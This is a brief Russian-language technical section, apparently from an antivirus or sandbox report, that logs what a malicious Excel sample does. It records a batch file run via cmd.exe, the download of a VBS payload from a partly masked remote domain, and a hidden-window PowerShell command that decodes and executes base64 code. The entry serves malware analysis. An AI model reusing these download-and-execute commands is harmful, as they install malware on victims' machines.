Техническая информация
- '<SYSTEM32>\cmd.exe' /c ""%HOMEPATH%\qsAuD.bat" "
- %HOMEPATH%\qsaud.bat
- <Текущая директория>\c0831000
- %HOMEPATH%\qsaud.bat
- <PATH_SAMPLE>.xls
- 'os##ighc.ga':80
- http://os##ighc.ga/gyhuj/Protected%20Client.vbs
- DNS ASK os##ighc.ga
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle hidden IEX([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICdTaWxlbnRseUNvbnRpbnVlJzskdTBoajQ0dHQgPSAnW0VudW1dOjpUb09iam...